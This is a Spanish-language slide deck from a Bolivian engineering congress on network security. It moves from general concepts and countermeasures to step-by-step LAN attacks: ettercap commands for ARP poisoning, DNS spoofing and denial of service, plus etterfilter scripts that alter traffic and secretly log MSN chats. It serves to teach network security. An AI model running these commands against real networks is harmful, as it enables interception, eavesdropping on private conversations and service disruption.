Sunteți pe pagina 1din 40

III Congreso Boliviano

de Ingeniería y Tecnología

Ing. Jorge Orellana Araoz


Docente Investigador MEMI-UMSS
Univ. Gonzalo Nina
Auxiliar Centro MEMI-UMSS
Seguridad
 La seguridad de las redes es una parte integral de las redes
informáticas. Incluye protocolos, tecnologías, dispositivos,
herramientas y técnicas que aseguran los datos y reducen
las amenazas.

 La mayor motivación de la seguridad en redes es el esfuerzo


por mantenerse un paso más adelante de los hackers
malintencionados. Del mismo modo que los médicos
intentan prevenir nuevas enfermedades tratando
problemas existentes, los profesionales de la seguridad en
redes intentan prevenir ataques minimizando los efectos de
los ataques en tiempo real.

2
Seguridad
Propiedades de la Seguridad
Informatica
Confidencialidad

Integridad

Disponibilidad
Estados de la Informacion
Procesamiento

Almacenamiento

Transmision
Medidas de Seguridad

Politicas y Procedimientos

Tecnologia

Educacion, Entrenamiento, y Conocimiento


Modelo de Seguridad de
Informacion Procesamiento
Almacenamiento
Transmision
Confidencialidad

Integridad

Disponibilidad

Politicas y Procedimientos
Tecnologia
Educacion, Entrenamiento, y
Conocimiento
Administracion de Riesgos

 El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel


aceptable de riesgo en la organización.
 El riego puede ser mitigado, pero nunca eliminado.
Amenazas a la Seguridad
Ataques de reconocimiento
Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin
autorización.

Ataques de acceso
Explotar vulnerabilidades conocidas en servicios de autenticación,
FTP y web para ganar acceso a cuentas web, bases de datos
confidenciales y otra información sensible.

Ataques de Denegación de Servicio


Envíar un número extremadamente grande de solicitudes en una red
o Internet. Estas solicitudes excesivas hacen que la calidad de
funcionamiento del dispositivo víctima sea inferior y no estar
disponible para acceso y uso legítimo.

9
Ataques de Reconocimiento
•Sniffers de paquetes
•Barridos de ping
•Escaneo de puertos
•Búsquedas de información en
Internet

10
Ataques de Acceso
•Ataques de contraseña
•Explotación de la confianza
•Redirección de puerto
•Ataque Man in the Middle
•Desbordamiento de buffer

11
Ataques de DoS
•SYN Flood Attack
•Teardrop Attacks
•Smurf Attack
•DNS Attacks
•Email Attacks
•Physical Infrastructure
Attacks
•Viruses/Worms

12
Ataques Especificos de Red
 ARP Attack
 Brute Force Attack
 Worms
 Flooding
 Sniffers
 Spoofing
 Redirected Attacks
 Tunneling Attack
 Covert Channels
Etapas de un ataque
 Hoy en dia los atacantes tienen gran cantidad de
blancos de ataque. Su gran desafio es seleccionar las
victimas mas vulnerables. Para esto realizan ataques
muy bien planeados y estructurados. Estos ataques
tienen etapas logisticas y estrategicas comunes:
 Reconocimiento
 Exploracion (direcciones, puertos, vulnerabilidades)
 Ganar acceso
 Mantener Acceso
 Cubrir Pistas
Contramedidas
 DMZ/NAT
 IDS/IPS
 Content Filtering/NAC
 Firewalls/proxy services
 Authentication/Authorization/Accounting
 Self-defending networks
 Policies, procedures, standards guidelines
 Training and awareness
Ataques En Redes LAN
 La seguridad en Redes LAN es muchas veces
inexistente y para probarlo se describen los
pasos necesarios para realizar algunos ataques
en redes de area local.
 Escenario Una red de area local (LAN) equipos
interconectados mediante dispositivos de
networking como ser concentradores (HUBs) o
encaminadores (switch). El equipo atacante
tiene que estar en la misma red que el equipo
victima.

16
Envenenamiento ARP
 Lanzar ataque:
root@bt#ettercap -T -q -i eth0 -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO

Donde:
- T : modo Texto
- q : quiet(No hace ruido) no muestra todo lo que
captura solo lo importante.
- i : Eleccion de la interfaz
- M : Metodo arp

17
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP

21
Envenenamiento ARP

22
Envenenamiento ARP

23
Envenenamiento ARP

24
DNS Spoof
1. Editar archivo de conguracion DNS
/usr/share/ettercap/etter.dns
dominio A direccion-ip

25
DNS Spoof
2. Lanzar el Ataque:
root@bt#ettercap -T -q -i eth0 -P dns spoof -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
- T : modo Texo
- q : quiet(No hace ruido) no muestra todo lo que
captura solo lo importante.
- i : Eleccion de la interfaz
- P : Activa el plugin dns spoof(previa conguracion)
- M : Metodo arp
- P : Activa el plugin dns spoof
D.O.S Denial of Service -Denegacion
de Servicio
1. Lanzar ataque:
root@bt#ettercap -T -q -i eth0 -P dos attack -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO
- T : modo Texo
- q : quiet(No hace ruido) no muestra todo lo que captura
solo lo importante.
- i : Eleccion de la interfaz
- M : Metodo arp
- P : Activa el plugin dos attack
2. Asignar valores
 Insert victim IP: ip de la victima.
 Insert unused IP: ip a donde direccionar el trafico.

28
Denegacion de Servicio

30
Denegacion de Servicio

31
Cambio de datos
1. Crear el filtro de cambio
Archivo banner
---------------------------------------------
# replace the FTP prompt por SSH
if (tcp.src == 21) {
replace("FTP","SSH");
}
---------------------------------------------
2. compilar:
root@bt#etterfilter banner -o banner.ef
3. Ejecutar el filtro + envenamiento ARP
 root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO

32
Alteracion de Conversaciones
(Caso MSN Messenger)
1. Crear el filtro de cambio
Archivo msn
-------------------------------------------------

34
Alteracion de Conversaciones
(Caso MSN Messenger)
2. compilar:
 root@bt#etterfilter msn -o msn.ef
3. Ejecutar el filtro + envenamiento ARP
 root@bt#ettercap -T -q -i eth0 -F msn.ef -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO

35
Grabar Chat
1. Crear el filtro de guardar conversaciones
 Archivo ver chat
--------------------------------------------------
if (tcp.src == 1863 || tcp.dst == 1863) {
log(DATA.data, "/tmp/msn.log");
msg("Texto plano MSN Guardado!XD\n");
}
--------------------------------------------------

37
Grabar Chat
2. compilar:
 root@bt#etterfilter verchar -o verchat.ef
3. Ejecutar el filtro + envenamiento ARP
 root@bt#ettercap -T -q -i eth0 -F verchat.ef -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
4. Revisar el archivo /tmp/msn.log

38

S-ar putea să vă placă și